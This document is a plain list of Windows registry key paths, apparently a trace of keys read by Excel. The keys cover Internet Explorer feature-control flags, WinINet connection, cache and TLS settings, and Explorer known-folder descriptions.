HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\EXCEL.EXE
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Category
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\ParentFolder
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\RelativePath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\ParsingName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\InfoTip
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\LocalizedName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Icon
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Security
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\StreamResource
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\StreamResourceType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Roamable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\PreCreate
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Stream
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\PublishExpandedPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\DefinitionFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Attributes
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\FolderTypeID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\PropertyBag
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\KnownFolders
HKEY_USERS\.DEFAULT
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Cache
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSAPIforCrack
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\EXCEL.EXE
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING\EXCEL.EXE
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BYPASS_CACHE_FOR_CREDPOLICY_KB936611
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BYPASS_CACHE_FOR_CREDPOLICY_KB936611
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BYPASS_CACHE_FOR_CREDPOLICY_KB936611
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_MAPPINGS_FOR_CREDPOLICY
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_MAPPINGS_FOR_CREDPOLICY
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_MAPPINGS_FOR_CREDPOLICY
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BUFFERBREAKING_818408
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BUFFERBREAKING_818408
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BUFFERBREAKING_818408
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALWAYS_USE_DNS_FOR_SPN_KB3022771
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALWAYS_USE_DNS_FOR_SPN_KB3022771
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALWAYS_USE_DNS_FOR_SPN_KB3022771
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISALLOW_NULL_IN_RESPONSE_HEADERS
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISALLOW_NULL_IN_RESPONSE_HEADERS
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISALLOW_NULL_IN_RESPONSE_HEADERS
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DIGEST_NO_EXTRAS_IN_URI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DIGEST_NO_EXTRAS_IN_URI
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DIGEST_NO_EXTRAS_IN_URI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_PASSPORT_SESSION_STORE_KB948608
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_PASSPORT_SESSION_STORE_KB948608
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXCLUDE_INVALID_CLIENT_CERT_KB929477
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXCLUDE_INVALID_CLIENT_CERT_KB929477
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXCLUDE_INVALID_CLIENT_CERT_KB929477
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_UTF8_FOR_BASIC_AUTH_KB967545
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_UTF8_FOR_BASIC_AUTH_KB967545
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_UTF8_FOR_BASIC_AUTH_KB967545
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RETURN_FAILED_CONNECT_CONTENT_KB942615
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RETURN_FAILED_CONNECT_CONTENT_KB942615
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RETURN_FAILED_CONNECT_CONTENT_KB942615
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRESERVE_SPACES_IN_FILENAMES_KB952730
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRESERVE_SPACES_IN_FILENAMES_KB952730
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRESERVE_SPACES_IN_FILENAMES_KB952730
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableZlibDeflate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FromCacheTimeout
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\LegacyTLSAppcompat
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\LegacyTLSAppcompat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\LegacyTLSAppcompat
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\LegacyTLSAppcompat
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableKeepAlive
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IdnEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreConnectLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreResolveLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CacheMode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBasicOverClearChannel
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableAutoProxyResultCache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisplayScriptDownloadFailureUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSServername
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UTF8ServerNameRes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableReadRange
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketSendBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketReceiveBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\KeepAliveTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxHttpRedirects
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ServerInfoTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableNTLMPreAuth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertCacheNoValidate
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_NOTIFY_UNVERIFIED_SPN_KB2385266
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_NOTIFY_UNVERIFIED_SPN_KB2385266
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_NOTIFY_UNVERIFIED_SPN_KB2385266
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_COMPAT_USE_CONNECTION_BASED_NEGOTIATE_AUTH_KB2151543
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_COMPAT_USE_CONNECTION_BASED_NEGOTIATE_AUTH_KB2151543
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_COMPAT_USE_CONNECTION_BASED_NEGOTIATE_AUTH_KB2151543
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HttpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FtpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\LeashLegacyCookies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendExtraCRLF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
